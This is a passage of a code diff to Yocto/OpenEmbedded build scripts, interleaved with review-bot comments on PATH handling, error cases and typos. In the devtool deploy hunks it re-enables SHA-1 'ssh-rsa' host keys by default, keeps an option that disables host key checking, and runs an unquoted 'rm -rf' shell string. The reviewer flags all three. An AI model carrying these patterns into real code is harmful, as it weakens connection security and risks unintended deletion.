-
if args.to:
log.info("Sending email to %s", ', '.join(args.to))
if args.cc:
log.info("Copying to %s", ', '.join(args.cc))
if args.bcc:
log.info("Blind copying to %s", ', '.join(args.bcc))
- send_email(args.text, html_report, images, args.subject,
- args.to, args.cc, args.bcc)
+ send_email(args.text, args.subject, args.to, args.cc, args.bcc)
except subprocess.CalledProcessError as err:
log.error("%s, with output:\n%s", str(err), err.output.decode())
return 1
- except ReportError as err:
- log.error(err)
- return 1
finally:
if not args.outdir:
log.debug("Wiping %s", outdir)
diff --git a/scripts/create-pull-request b/scripts/create-pull-request
index 8eefcf63a5..2f91a355b0 100755
--- a/scripts/create-pull-request
+++ b/scripts/create-pull-request
@@ -128,7 +128,7 @@ PROTO_RE="[a-z][a-z+]*://"
GIT_RE="\(^\($PROTO_RE\)\?\)\($USER_RE@\)\?\([^:/]*\)[:/]\(.*\)"
REMOTE_URL=${REMOTE_URL%.git}
REMOTE_REPO=$(echo $REMOTE_URL | sed "s#$GIT_RE#\5#")
-REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#git://\4/\5#")
+REMOTE_URL=$(echo $REMOTE_URL | sed "s#$GIT_RE#https://\4/\5#")
if [ -z "$BRANCH" ]; then
BRANCH=$(git branch | grep -e "^\* " | cut -d' ' -f2)
diff --git a/scripts/git b/scripts/git
new file mode 100755
index 0000000000..644055e540
--- /dev/null
+++ b/scripts/git
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+#
+# Wrapper around 'git' that doesn't think we are root
+
+import os
+import shutil
+import sys
+
+os.environ['PSEUDO_UNLOAD'] = '1'
+
+# calculate path to the real 'git'
+path = os.environ['PATH']
+# we need to remove our path but also any other copy of this script which
+# may be present, e.g. eSDK.
+replacements = [os.path.dirname(sys.argv[0])]
+for p in path.split(":"):
+ if p.endswith("/scripts"):
+ replacements.append(p)
+for r in replacements:
+ path = path.replace(r, '/ignoreme')
+real_git = shutil.which('git', path=path)
+
+if len(sys.argv) == 1:
+ os.execl(real_git, 'git')
+
+os.execv(real_git, sys.argv)
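Review bot: The PATH clean-up uses `path.replace(r, '/ignoreme')`, a substring replacement over the whole PATH string, so an entry that merely starts with one of the collected directories is rewritten too (constructed example: `/work/scripts-extra` becomes `/ignoreme-extra`). An empty `os.path.dirname(sys.argv[0])` would insert `/ignoreme` between every character. `shutil.which` returns None when nothing is found, and that value is passed straight to `os.execl`/`os.execv`, which then fails with a TypeError instead of a readable message. Because this wrapper decides which `git` binary actually runs, I would filter PATH entry by entry and stop with an explicit error when no other git is left.

```python
# calculate path to the real 'git'
ourdir = os.path.dirname(os.path.abspath(sys.argv[0]))
# drop our own directory and any other copy of this script (e.g. eSDK)
entries = [p for p in os.environ.get('PATH', '').split(":")
           if p and os.path.abspath(p) != ourdir and not p.endswith("/scripts")]
real_git = shutil.which('git', path=":".join(entries))
if real_git is None:
    sys.exit("git wrapper: no other 'git' found in PATH")
# … unchanged: os.execl / os.execv calls …
```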
diff --git a/scripts/lib/buildstats.py b/scripts/lib/buildstats.py
index c69b5bf4d7..3b76286ba5 100644
--- a/scripts/lib/buildstats.py
+++ b/scripts/lib/buildstats.py
@@ -8,7 +8,7 @@ import json
import logging
import os
import re
-from collections import namedtuple,OrderedDict
+from collections import namedtuple
from statistics import mean
@@ -238,7 +238,7 @@ class BuildStats(dict):
subdirs = os.listdir(path)
for dirname in subdirs:
recipe_dir = os.path.join(path, dirname)
- if not os.path.isdir(recipe_dir):
+ if dirname == "reduced_proc_pressure" or not os.path.isdir(recipe_dir):
continue
name, epoch, version, revision = cls.split_nevr(dirname)
bsrecipe = BSRecipe(name, epoch, version, revision)
diff --git a/scripts/lib/checklayer/__init__.py b/scripts/lib/checklayer/__init__.py
index fe545607bb..e69a10f452 100644
--- a/scripts/lib/checklayer/__init__.py
+++ b/scripts/lib/checklayer/__init__.py
@@ -146,7 +146,7 @@ def detect_layers(layer_directories, no_auto):
return layers
-def _find_layer_depends(depend, layers):
+def _find_layer(depend, layers):
for layer in layers:
if 'collections' not in layer:
continue
@@ -156,7 +156,7 @@ def _find_layer_depends(depend, layers):
return layer
return None
-def add_layer_dependencies(bblayersconf, layer, layers, logger):
+def get_layer_dependencies(layer, layers, logger):
def recurse_dependencies(depends, layer, layers, logger, ret = []):
logger.debug('Processing dependencies %s for layer %s.' % \
(depends, layer['name']))
@@ -166,7 +166,7 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
if depend == 'core':
continue
- layer_depend = _find_layer_depends(depend, layers)
+ layer_depend = _find_layer(depend, layers)
if not layer_depend:
logger.error('Layer %s depends on %s and isn\'t found.' % \
(layer['name'], depend))
@@ -203,6 +203,11 @@ def add_layer_dependencies(bblayersconf, layer, layers, logger):
layer_depends = recurse_dependencies(depends, layer, layers, logger, layer_depends)
# Note: [] (empty) is allowed, None is not!
+ return layer_depends
+
+def add_layer_dependencies(bblayersconf, layer, layers, logger):
+
+ layer_depends = get_layer_dependencies(layer, layers, logger)
if layer_depends is None:
return False
else:
diff --git a/scripts/lib/checklayer/cases/common.py b/scripts/lib/checklayer/cases/common.py
index b82304e361..4495f71b24 100644
--- a/scripts/lib/checklayer/cases/common.py
+++ b/scripts/lib/checklayer/cases/common.py
@@ -14,7 +14,7 @@ class CommonCheckLayer(OECheckLayerTestCase):
# The top-level README file may have a suffix (like README.rst or README.txt).
readme_files = glob.glob(os.path.join(self.tc.layer['path'], '[Rr][Ee][Aa][Dd][Mm][Ee]*'))
self.assertTrue(len(readme_files) > 0,
- msg="Layer doesn't contains README file.")
+ msg="Layer doesn't contain a README file.")
# There might be more than one file matching the file pattern above
# (for example, README.rst and README-COPYING.rst). The one with the shortest
diff --git a/scripts/lib/devtool/deploy.py b/scripts/lib/devtool/deploy.py
index aaa25dda08..b4f9fbfe45 100644
--- a/scripts/lib/devtool/deploy.py
+++ b/scripts/lib/devtool/deploy.py
@@ -168,9 +168,9 @@ def deploy(args, config, basepath, workspace):
if args.strip and not args.dry_run:
# Fakeroot copy to new destination
srcdir = recipe_outdir
- recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'deploy-target-stripped')
+ recipe_outdir = os.path.join(rd.getVar('WORKDIR'), 'devtool-deploy-target-stripped')
if os.path.isdir(recipe_outdir):
- bb.utils.remove(recipe_outdir, True)
+ exec_fakeroot(rd, "rm -rf %s" % recipe_outdir, shell=True)
exec_fakeroot(rd, "cp -af %s %s" % (os.path.join(srcdir, '.'), recipe_outdir), shell=True)
os.environ['PATH'] = ':'.join([os.environ['PATH'], rd.getVar('PATH') or ''])
oe.package.strip_execs(args.recipename, recipe_outdir, rd.getVar('STRIP'), rd.getVar('libdir'),
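Review bot: The new `exec_fakeroot(rd, "rm -rf %s" % recipe_outdir, shell=True)` interpolates a path into a shell string without quoting, so a WORKDIR containing spaces or shell metacharacters makes `rm -rf` act on something other than the stripped copy. Quoting the argument keeps the deletion confined to the intended directory: `exec_fakeroot(rd, "rm -rf -- %s" % shlex.quote(recipe_outdir), shell=True)`. That needs `import shlex` if the file does not already have it, which is not visible here. The `cp -af` call on the following context line builds its command the same way. deploy() starts and ends outside this hunk.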
@@ -201,9 +201,9 @@ def deploy(args, config, basepath, workspace):
print(' %s' % item)
return 0
- extraoptions = ''
+ extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
if args.no_host_check:
- extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+ extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
if not args.show_status:
extraoptions += ' -q'
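Review bot: `extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'` re-enables the SHA-1 based ssh-rsa host key algorithm for every deploy connection, including targets that already offer a stronger host key type, and nothing in the hunk says why. The same line is added to undeploy() in the next hunk. If the reason is targets whose SSH server offers only RSA host keys, I would say so in a comment above both lines, e.g. `# ssh-rsa re-enabled for targets that only offer RSA/SHA-1 host keys; remove when no longer needed`. Preferably it would be applied only on request (a command-line switch or config setting), so the default stays at the client's own algorithm list. Both functions continue outside their hunks.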
@@ -274,9 +274,9 @@ def undeploy(args, config, basepath, workspace):
elif not args.recipename and not args.all:
raise argparse_oe.ArgumentUsageError('If you don\'t specify a recipe, you must specify -a/--all', 'undeploy-target')
- extraoptions = ''
+ extraoptions = '-o HostKeyAlgorithms=+ssh-rsa'
if args.no_host_check:
- extraoptions += '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+ extraoptions += ' -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
if not args.show_status:
extraoptions += ' -q'
diff --git a/scripts/lib/devtool/menuconfig.py b/scripts/lib/devtool/menuconfig.py
index 95384c5333..ff9227035d 100644
--- a/scripts/lib/devtool/menuconfig.py
+++ b/scripts/lib/devtool/menuconfig.py
@@ -43,7 +43,7 @@ def menuconfig(args, config, basepath, workspace):
return 1
check_workspace_recipe(workspace, args.component)
- pn = rd.getVar('PN', True)
+ pn = rd.getVar('PN')
if not rd.getVarFlag('do_menuconfig','task'):
raise DevtoolError("This recipe does not support menuconfig option")
diff --git a/scripts/lib/devtool/standard.py b/scripts/lib/devtool/standard.py
index d140b97de1..cfa88616af 100644
--- a/scripts/lib/devtool/standard.py
+++ b/scripts/lib/devtool/standard.py
@@ -357,7 +357,7 @@ def _move_file(src, dst, dry_run_outdir=None, base_outdir=None):
bb.utils.mkdirhier(dst_d)
shutil.move(src, dst)
-def _copy_file(src, dst, dry_run_outdir=None):
+def _copy_file(src, dst, dry_run_outdir=None, base_outdir=None):
"""Copy a file. Creates all the directory components of destination path."""
dry_run_suffix = ' (dry-run)' if dry_run_outdir else ''
logger.debug('Copying %s to %s%s' % (src, dst, dry_run_suffix))
@@ -474,7 +474,11 @@ def symlink_oelocal_files_srctree(rd,srctree):
destpth = os.path.join(srctree, relpth, fn)
if os.path.exists(destpth):
os.unlink(destpth)
- os.symlink('oe-local-files/%s' % fn, destpth)
+ if relpth != '.':
+ back_relpth = os.path.relpath(local_files_dir, root)
+ os.symlink('%s/oe-local-files/%s/%s' % (back_relpth, relpth, fn), destpth)
+ else:
+ os.symlink('oe-local-files/%s' % fn, destpth)
addfiles.append(os.path.join(relpth, fn))
if addfiles:
bb.process.run('git add %s' % ' '.join(addfiles), cwd=srctree)
@@ -531,7 +535,6 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
initial_rev = None
- appendexisted = False
recipefile = d.getVar('FILE')
appendfile = recipe_to_append(recipefile, config)
is_kernel_yocto = bb.data.inherits_class('kernel-yocto', d)
@@ -590,6 +593,16 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
else:
task = 'do_patch'
+ if 'noexec' in (d.getVarFlags(task, False) or []) or 'task' not in (d.getVarFlags(task, False) or []):
+ logger.info('The %s recipe has %s disabled. Running only '
+ 'do_configure task dependencies' % (pn, task))
+
+ if 'depends' in d.getVarFlags('do_configure', False):
+ pn = d.getVarFlags('do_configure', False)['depends']
+ pn = pn.replace('${PV}', d.getVar('PV'))
+ pn = pn.replace('${COMPILERDEP}', d.getVar('COMPILERDEP'))
+ task = None
+
# Run the fetch + unpack tasks
res = tinfoil.build_targets(pn,
task,
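Review bot: In the added block, `'depends' in d.getVarFlags('do_configure', False)` lacks the `or []` guard used two lines above it, and `pn.replace('${COMPILERDEP}', d.getVar('COMPILERDEP'))` raises TypeError if that variable is unset, because `str.replace` does not accept None. The block also overwrites `pn` with the dependency string, so the `'Extracting source for %s failed' % pn` message in the next hunk would print the dependency list instead of the recipe name. Reading the flags once (`task_flags = d.getVarFlags(task, False) or {}`) and keeping the build target in its own variable would address both. `_extract_source` begins and ends outside this hunk.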
@@ -601,6 +614,17 @@ def _extract_source(srctree, keep_temp, devbranch, sync, config, basepath, works
if not res:
raise DevtoolError('Extracting source for %s failed' % pn)
+ if not is_kernel_yocto and ('noexec' in (d.getVarFlags('do_patch', False) or []) or 'task' not in (d.getVarFlags('do_patch', False) or [])):
+ workshareddir = d.getVar('S')
+ if os.path.islink(srctree):
+ os.unlink(srctree)
+
+ os.symlink(workshareddir, srctree)
+
+ # The initial_rev file is created in devtool_post_unpack function that will not be executed if
+ # do_unpack/do_patch tasks are disabled so we have to directly say that source extraction was successful
+ return True, True
+
try:
with open(os.path.join(tempdir, 'initial_rev'), 'r') as f:
initial_rev = f.read()
@@ -848,10 +872,11 @@ def modify(args, config, basepath, workspace):
if not initial_rev:
return 1
logger.info('Source tree extracted to %s' % srctree)
- # Get list of commits since this revision
- (stdout, _) = bb.process.run('git rev-list --reverse %s..HEAD' % initial_rev, cwd=srctree)
- commits = stdout.split()
- check_commits = True
+ if os.path.exists(os.path.join(srctree, '.git')):
+ # Get list of commits since this revision
+ (stdout, _) = bb.process.run('git rev-list --reverse %s..HEAD' % initial_rev, cwd=srctree)
+ commits = stdout.split()
+ check_commits = True
else:
if os.path.exists(os.path.join(srctree, '.git')):
# Check if it's a tree previously extracted by us. This is done
@@ -928,12 +953,17 @@ def modify(args, config, basepath, workspace):
if bb.data.inherits_class('kernel', rd):
f.write('SRCTREECOVEREDTASKS = "do_validate_branches do_kernel_checkout '
- 'do_fetch do_unpack do_kernel_configme do_kernel_configcheck"\n')
+ 'do_fetch do_unpack do_kernel_configcheck"\n')
f.write('\ndo_patch[noexec] = "1"\n')
f.write('\ndo_configure_append() {\n'
' cp ${B}/.config ${S}/.config.baseline\n'
' ln -sfT ${B}/.config ${S}/.config.new\n'
'}\n')
+ f.write('\ndo_kernel_configme_prepend() {\n'
+ ' if [ -e ${S}/.config ]; then\n'
+ ' mv ${S}/.config ${S}/.config.old\n'
+ ' fi\n'
+ '}\n')
if rd.getVarFlag('do_menuconfig','task'):
f.write('\ndo_configure_append() {\n'
' if [ ! ${DEVTOOL_DISABLE_MENUCONFIG} ]; then\n'
diff --git a/scripts/lib/recipetool/create.py b/scripts/lib/recipetool/create.py
index 566c75369a..a2c6d052a6 100644
--- a/scripts/lib/recipetool/create.py
+++ b/scripts/lib/recipetool/create.py
@@ -435,7 +435,7 @@ def create_recipe(args):
if args.binary:
# Assume the archive contains the directory structure verbatim
# so we need to extract to a subdirectory
- fetchuri += ';subdir=${BP}'
+ fetchuri += ';subdir=${BPN}'
srcuri = fetchuri
rev_re = re.compile(';rev=([^;]+)')
res = rev_re.search(srcuri)
@@ -478,6 +478,9 @@ def create_recipe(args):
storeTagName = params['tag']
params['nobranch'] = '1'
del params['tag']
+ # Assume 'master' branch if not set
+ if scheme in ['git', 'gitsm'] and 'branch' not in params and 'nobranch' not in params:
+ params['branch'] = 'master'
fetchuri = bb.fetch2.encodeurl((scheme, network, path, user, passwd, params))
tmpparent = tinfoil.config_data.getVar('BASE_WORKDIR')
@@ -527,10 +530,9 @@ def create_recipe(args):
# Remove HEAD reference point and drop remote prefix
get_branch = [x.split('/', 1)[1] for x in get_branch if not x.startswith('origin/HEAD')]
if 'master' in get_branch:
- # If it is master, we do not need to append 'branch=master' as this is default.
# Even with the case where get_branch has multiple objects, if 'master' is one
# of them, we should default take from 'master'
- srcbranch = ''
+ srcbranch = 'master'
elif len(get_branch) == 1:
# If 'master' isn't in get_branch and get_branch contains only ONE object, then store result into 'srcbranch'
srcbranch = get_branch[0]
@@ -543,8 +545,8 @@ def create_recipe(args):
# Since we might have a value in srcbranch, we need to
# recontruct the srcuri to include 'branch' in params.
scheme, network, path, user, passwd, params = bb.fetch2.decodeurl(srcuri)
- if srcbranch:
- params['branch'] = srcbranch
+ if scheme in ['git', 'gitsm']:
+ params['branch'] = srcbranch or 'master'
if storeTagName and scheme in ['git', 'gitsm']:
# Check srcrev using tag and check validity of the tag
@@ -603,7 +605,7 @@ def create_recipe(args):
splitline = line.split()
if len(splitline) > 1:
if splitline[0] == 'origin' and scriptutils.is_src_url(splitline[1]):
- srcuri = reformat_git_uri(splitline[1])
+ srcuri = reformat_git_uri(splitline[1]) + ';branch=master'
srcsubdir = 'git'
break
@@ -743,6 +745,10 @@ def create_recipe(args):
for handler in handlers:
handler.process(srctree_use, classes, lines_before, lines_after, handled, extravalues)
+ # native and nativesdk classes are special and must be inherited last
+ # If present, put them at the end of the classes list
+ classes.sort(key=lambda c: c in ("native", "nativesdk"))
+
extrafiles = extravalues.pop('extrafiles', {})
extra_pn = extravalues.pop('PN', None)
extra_pv = extravalues.pop('PV', None)
diff --git a/scripts/lib/resulttool/report.py b/scripts/lib/resulttool/report.py
index f0ca50ebe2..a349510ab8 100644
--- a/scripts/lib/resulttool/report.py
+++ b/scripts/lib/resulttool/report.py
@@ -176,7 +176,10 @@ class ResultsTextReport(object):
vals['sort'] = line['testseries'] + "_" + line['result_id']
vals['failed_testcases'] = line['failed_testcases']
for k in cols:
- vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f'))
+ if total_tested:
+ vals[k] = "%d (%s%%)" % (line[k], format(line[k] / total_tested * 100, '.0f'))
+ else:
+ vals[k] = "0 (0%)"
for k in maxlen:
if k in vals and len(vals[k]) > maxlen[k]:
maxlen[k] = len(vals[k])
diff --git a/scripts/lib/resulttool/resultutils.py b/scripts/lib/resulttool/resultutils.py
index 8917022d36..c5521d81bd 100644
--- a/scripts/lib/resulttool/resultutils.py
+++ b/scripts/lib/resulttool/resultutils.py
@@ -58,7 +58,11 @@ def append_resultsdata(results, f, configmap=store_map, configvars=extra_configv
testseries = posixpath.basename(posixpath.dirname(url.path))
else:
with open(f, "r") as filedata:
- data = json.load(filedata)
+ try:
+ data = json.load(filedata)
+ except json.decoder.JSONDecodeError:
+ print("Cannot decode {}. Possible corruption. Skipping.".format(f))
+ data = ""
testseries = os.path.basename(os.path.dirname(f))
else:
data = f
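Review bot: When `json.load` fails, the new handler prints to stdout and sets `data = ""`, a string where the success path yields whatever `json.load` returned, so the code after this hunk (not visible) has to cope with a different type. A results file that is truncated or altered then drops out of the report with only a stdout line as evidence. I would emit the message at warning level through the module's logger, if it has one, and use a value of the expected type such as `data = {}`, or return early.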
@@ -142,7 +146,7 @@ def generic_get_log(sectionname, results, section):
return decode_log(ptest['log'])
def ptestresult_get_log(results, section):
- return generic_get_log('ptestresuls.sections', results, section)
+ return generic_get_log('ptestresult.sections', results, section)
def generic_get_rawlogs(sectname, results):
if sectname not in results:
diff --git a/scripts/lib/scriptutils.py b/scripts/lib/scriptutils.py
index f92255d8dc..47a08194d0 100644
--- a/scripts/lib/scriptutils.py
+++ b/scripts/lib/scriptutils.py
@@ -18,7 +18,8 @@ import sys
import tempfile
import threading
import importlib
-from importlib import machinery
+import importlib.machinery
+import importlib.util
class KeepAliveStreamHandler(logging.StreamHandler):
def __init__(self, keepalive=True, **kwargs):
@@ -82,7 +83,9 @@ def load_plugins(logger, plugins, pluginpath):
logger.debug('Loading plugin %s' % name)
spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] )
if spec:
- return spec.loader.load_module()
+ mod = importlib.util.module_from_spec(spec)
+ spec.loader.exec_module(mod)
+ return mod
def plugin_name(filename):
return os.path.splitext(os.path.basename(filename))[0]
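Review bot: `spec.loader.load_module()` registered the plugin in `sys.modules`, while the replacement `module_from_spec` plus `exec_module` does not, so a plugin that is loaded twice or looked up by name later gets a separate module object each time. The importlib documentation's recipe places `sys.modules[name] = mod` between the two calls. If leaving it out is deliberate, for instance to keep plugin names from shadowing real modules, a one-line comment saying so would help. `exec_module` runs the plugin's top-level code, so `pluginpath` should only ever point at directories the invoking user controls. The enclosing function starts outside this hunk.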
@@ -215,7 +218,8 @@ def fetch_url(tinfoil, srcuri, srcrev, destdir, logger, preserve_tmp=False, mirr
pathvars = ['T', 'RECIPE_SYSROOT', 'RECIPE_SYSROOT_NATIVE']
for pathvar in pathvars:
path = rd.getVar(pathvar)
- shutil.rmtree(path)
+ if os.path.exists(path):
+ shutil.rmtree(path)
finally:
if fetchrecipe:
try:
diff --git a/scripts/lib/wic/engine.py b/scripts/lib/wic/engine.py
index 9ff4394757..7dbde85696 100644
--- a/scripts/lib/wic/engine.py
+++ b/scripts/lib/wic/engine.py
@@ -19,10 +19,10 @@ import os
import tempfile
import json
import subprocess
+import shutil
import re
from collections import namedtuple, OrderedDict
-from distutils.spawn import find_executable
from wic import WicError
from wic.filemap import sparse_copy
@@ -245,7 +245,7 @@ class Disk:
for path in pathlist.split(':'):
self.paths = "%s%s:%s" % (native_sysroot, path, self.paths)
- self.parted = find_executable("parted", self.paths)
+ self.parted = shutil.which("parted", path=self.paths)
if not self.parted:
raise WicError("Can't find executable parted")
@@ -283,7 +283,7 @@ class Disk:
"resize2fs", "mkswap", "mkdosfs", "debugfs"):
aname = "_%s" % name
if aname not in self.__dict__:
- setattr(self, aname, find_executable(name, self.paths))
+ setattr(self, aname, shutil.which(name, path=self.paths))
if aname not in self.__dict__ or self.__dict__[aname] is None:
raise WicError("Can't find executable '{}'".format(name))
return self.__dict__[aname]
diff --git a/scripts/lib/wic/help.py b/scripts/lib/wic/help.py
index 1e3d06a87b..fcace95ff4 100644
--- a/scripts/lib/wic/help.py
+++ b/scripts/lib/wic/help.py
@@ -840,8 +840,8 @@ DESCRIPTION
meanings. The commands are based on the Fedora kickstart
documentation but with modifications to reflect wic capabilities.
- http://fedoraproject.org/wiki/Anaconda/Kickstart#part_or_partition
- http://fedoraproject.org/wiki/Anaconda/Kickstart#bootloader
+ https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#part-or-partition
+ https://pykickstart.readthedocs.io/en/latest/kickstart-docs.html#bootloader
Commands
@@ -980,6 +980,12 @@ DESCRIPTION
copies. This option only has an effect with the rootfs
source plugin.
+ --change-directory: This option is specific to wic. It changes to the
+ given directory before copying the files. This
+ option is useful when we want to split a rootfs in
+ multiple partitions and we want to keep the right
+ permissions and usernames in all the partitions.
+
--extra-space: This option is specific to wic. It adds extra
space after the space filled by the content
of the partition. The final size can go
diff --git a/scripts/lib/wic/ksparser.py b/scripts/lib/wic/ksparser.py
index 76cc55b848..452a160232 100644
--- a/scripts/lib/wic/ksparser.py
+++ b/scripts/lib/wic/ksparser.py
@@ -152,6 +152,7 @@ class KickStart():
part.add_argument('--offset', type=sizetype("K", True))
part.add_argument('--exclude-path', nargs='+')
part.add_argument('--include-path', nargs='+')
+ part.add_argument('--change-directory')
part.add_argument("--extra-space", type=sizetype("M"))
part.add_argument('--fsoptions', dest='fsopts')
part.add_argument('--fstype', default='vfat',
@@ -228,6 +229,23 @@ class KickStart():
err = "%s:%d: SquashFS does not support LABEL" \
% (confpath, lineno)
raise KickStartError(err)
+ if parsed.fstype == 'msdos' or parsed.fstype == 'vfat':
+ if parsed.fsuuid:
+ if parsed.fsuuid.upper().startswith('0X'):
+ if len(parsed.fsuuid) > 10:
+ err = "%s:%d: fsuuid %s given in wks kickstart file " \
+ "exceeds the length limit for %s filesystem. " \
+ "It should be in the form of a 32 bit hexadecimal" \
+ "number (for example, 0xABCD1234)." \
+ % (confpath, lineno, parsed.fsuuid, parsed.fstype)
+ raise KickStartError(err)
+ elif len(parsed.fsuuid) > 8:
+ err = "%s:%d: fsuuid %s given in wks kickstart file " \
+ "exceeds the length limit for %s filesystem. " \
+ "It should be in the form of a 32 bit hexadecimal" \
+ "number (for example, 0xABCD1234)." \
+ % (confpath, lineno, parsed.fsuuid, parsed.fstype)
+ raise KickStartError(err)
if parsed.use_label and not parsed.label:
err = "%s:%d: Must set the label with --label" \
% (confpath, lineno)
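Review bot: Both new error messages join `"... 32 bit hexadecimal"` and `"number (for example, ..."` without a space, so the user sees "hexadecimalnumber"; the first literal needs a trailing space. The two branches differ only in the limit, so `limit = 10 if parsed.fsuuid.upper().startswith('0X') else 8` followed by a single `if len(parsed.fsuuid) > limit:` would remove the duplicated message. The check covers length only, so a value of the right length that is not hexadecimal still passes here.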
diff --git a/scripts/lib/wic/misc.py b/scripts/lib/wic/misc.py
index fe4abe8115..3e11822996 100644
--- a/scripts/lib/wic/misc.py
+++ b/scripts/lib/wic/misc.py
@@ -16,9 +16,9 @@ import logging
import os
import re
import subprocess
+import shutil
from collections import defaultdict
-from distutils import spawn
from wic import WicError
@@ -26,6 +26,7 @@ logger = logging.getLogger('wic')
# executable -> recipe pairs for exec_native_cmd
NATIVE_RECIPES = {"bmaptool": "bmap-tools",
+ "dumpe2fs": "e2fsprogs",
"grub-mkimage": "grub-efi",
"isohybrid": "syslinux",
"mcopy": "mtools",
@@ -45,7 +46,8 @@ NATIVE_RECIPES = {"bmaptool": "bmap-tools",
"parted": "parted",
"sfdisk": "util-linux",
"sgdisk": "gptfdisk",
- "syslinux": "syslinux"
+ "syslinux": "syslinux",
+ "tar": "tar"
}
def runtool(cmdln_or_args):
@@ -112,6 +114,15 @@ def exec_cmd(cmd_and_args, as_shell=False):
"""
return _exec_cmd(cmd_and_args, as_shell)[1]
+def find_executable(cmd, paths):
+ recipe = cmd
+ if recipe in NATIVE_RECIPES:
+ recipe = NATIVE_RECIPES[recipe]
+ provided = get_bitbake_var("ASSUME_PROVIDED")
+ if provided and "%s-native" % recipe in provided:
+ return True
+
+ return shutil.which(cmd, path=paths)
def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
"""
@@ -128,16 +139,19 @@ def exec_native_cmd(cmd_and_args, native_sysroot, pseudo=""):
if pseudo:
cmd_and_args = pseudo + cmd_and_args
- native_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin:%s/bin" % \
+ hosttools_dir = get_bitbake_var("HOSTTOOLS_DIR")
+
+ native_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin:%s/bin:%s" % \
(native_sysroot, native_sysroot,
- native_sysroot, native_sysroot)
+ native_sysroot, native_sysroot,
+ hosttools_dir)
native_cmd_and_args = "export PATH=%s:$PATH;%s" % \
(native_paths, cmd_and_args)
logger.debug("exec_native_cmd: %s", native_cmd_and_args)
# If the command isn't in the native sysroot say we failed.
- if spawn.find_executable(args[0], native_paths):
+ if find_executable(args[0], native_paths):
ret, out = _exec_cmd(native_cmd_and_args, True)
else:
ret = 127
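Review bot: `hosttools_dir` is appended to `native_paths` unconditionally, although the new `find_executable` in this file treats a `get_bitbake_var` result as possibly empty. If `HOSTTOOLS_DIR` is unset and the call yields None, the exported PATH gains a literal relative entry `None`, which the shell resolves against the current directory. Append it only when set, e.g. `if hosttools_dir: native_paths += ":%s" % hosttools_dir`. The new `find_executable` can also return True without the tool being under `native_paths`, so the comment "If the command isn't in the native sysroot say we failed" no longer describes the check. exec_native_cmd continues outside this hunk.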
diff --git a/scripts/lib/wic/partition.py b/scripts/lib/wic/partition.py
index 3490b4e75d..792bb3dcd3 100644
--- a/scripts/lib/wic/partition.py
+++ b/scripts/lib/wic/partition.py
@@ -31,6 +31,7 @@ class Partition():
self.extra_space = args.extra_space
self.exclude_path = args.exclude_path
self.include_path = args.include_path
+ self.change_directory = args.change_directory
self.fsopts = args.fsopts
self.fstype = args.fstype
self.label = args.label
@@ -53,6 +54,9 @@ class Partition():
self.uuid = args.uuid
self.fsuuid = args.fsuuid
self.type = args.type
+ self.updated_fstab_path = None
+ self.has_fstab = False
+ self.update_fstab_in_rootfs = False
self.lineno = lineno
self.source_file = ""
@@ -100,7 +104,7 @@ class Partition():
extra_blocks = self.extra_space
rootfs_size = actual_rootfs_size + extra_blocks
- rootfs_size *= self.overhead_factor
+ rootfs_size = int(rootfs_size * self.overhead_factor)
logger.debug("Added %d extra blocks to %s to get to %d total blocks",
extra_blocks, self.mountpoint, rootfs_size)
@@ -117,11 +121,15 @@ class Partition():
return self.fixed_size if self.fixed_size else self.size
def prepare(self, creator, cr_workdir, oe_builddir, rootfs_dir,
- bootimg_dir, kernel_dir, native_sysroot):
+ bootimg_dir, kernel_dir, native_sysroot, updated_fstab_path):
"""
Prepare content for individual partitions, depending on
partition command parameters.
"""
+ self.updated_fstab_path = updated_fstab_path
+ if self.updated_fstab_path and not (self.fstype.startswith("ext") or self.fstype == "msdos"):
+ self.update_fstab_in_rootfs = True
+
if not self.source:
if not self.size and not self.fixed_size:
raise WicError("The %s partition has a size of zero. Please "
@@ -191,29 +199,40 @@ class Partition():
(self.mountpoint, self.size, self.fixed_size))
def prepare_rootfs(self, cr_workdir, oe_builddir, rootfs_dir,
- native_sysroot, real_rootfs = True):
+ native_sysroot, real_rootfs = True, pseudo_dir = None):
"""
Prepare content for a rootfs partition i.e. create a partition
and fill it from a /rootfs dir.
Currently handles ext2/3/4, btrfs, vfat and squashfs.
"""
- p_prefix = os.environ.get("PSEUDO_PREFIX", "%s/usr" % native_sysroot)
- p_localstatedir = os.environ.get("PSEUDO_LOCALSTATEDIR",
- "%s/../pseudo" % rootfs_dir)
- p_passwd = os.environ.get("PSEUDO_PASSWD", rootfs_dir)
- p_nosymlinkexp = os.environ.get("PSEUDO_NOSYMLINKEXP", "1")
- pseudo = "export PSEUDO_PREFIX=%s;" % p_prefix
- pseudo += "export PSEUDO_LOCALSTATEDIR=%s;" % p_localstatedir
- pseudo += "export PSEUDO_PASSWD=%s;" % p_passwd
- pseudo += "export PSEUDO_NOSYMLINKEXP=%s;" % p_nosymlinkexp
- pseudo += "%s " % get_bitbake_var("FAKEROOTCMD")
rootfs = "%s/rootfs_%s.%s.%s" % (cr_workdir, self.label,
self.lineno, self.fstype)
if os.path.isfile(rootfs):
os.remove(rootfs)
+ p_prefix = os.environ.get("PSEUDO_PREFIX", "%s/usr" % native_sysroot)
+ if (pseudo_dir):
+ # Canonicalize the ignore paths. This corresponds to
+ # calling oe.path.canonicalize(), which is used in bitbake.conf.
+ ignore_paths = [rootfs] + (get_bitbake_var("PSEUDO_IGNORE_PATHS") or "").split(",")
+ canonical_paths = []
+ for path in ignore_paths:
+ if "$" not in path:
+ trailing_slash = path.endswith("/") and "/" or ""
+ canonical_paths.append(os.path.realpath(path) + trailing_slash)
